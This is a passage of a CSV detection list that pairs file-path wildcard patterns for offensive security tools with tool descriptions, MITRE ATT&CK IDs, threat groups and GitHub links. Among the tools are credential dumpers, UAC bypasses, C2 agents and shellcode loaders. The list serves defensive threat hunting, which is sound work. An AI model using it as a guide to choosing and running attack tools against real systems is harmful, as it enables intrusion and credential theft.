TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" +"*/S3cur3Th1sSh1t/*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" +"*/S3Scanner.git*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*/s4n7h0/NSE*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*/S4UTomato.git*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*/s7-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/saefko.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/Safer_PoC_CVE*","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" +"*/SafetyKatz.git*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*/sam_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/samba-vuln-cve-2012-1182.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/samdump.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/samdump2*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" +"*/samruser.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/sap_default.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sc_inject/inject/*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*/scan4all.git*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scan4all/lib/api*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scan4all/lib/util*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scanner/discovery*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/kerberos*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/pcanywhere*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/portscan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/winrm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scannerPort.go*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" +"*/scan-network.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Scans/servers_all_smb*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ScareCrow -I *","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/sccmhunter*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*/schtasksenum/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*/scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*/SCMUACBypass.git*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*/SCMUACBypass/*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*/ScreenshotInject*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/scripts/xor.py*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*/ScriptSentry.git*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*/ScriptSentry.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*/ScriptSentry.psd1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*/ScriptSentry.psm1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*/ScRunHex.py*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*/scshell*","offensive_tool_keyword","scshell","SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*/scshell.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/scuffy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/searchsploit*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/Seatbelt.txt*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/Seatbelt/Commands*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*/SeBackupPrivilege.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/secinject.c*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*/SecretFinder.git*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" 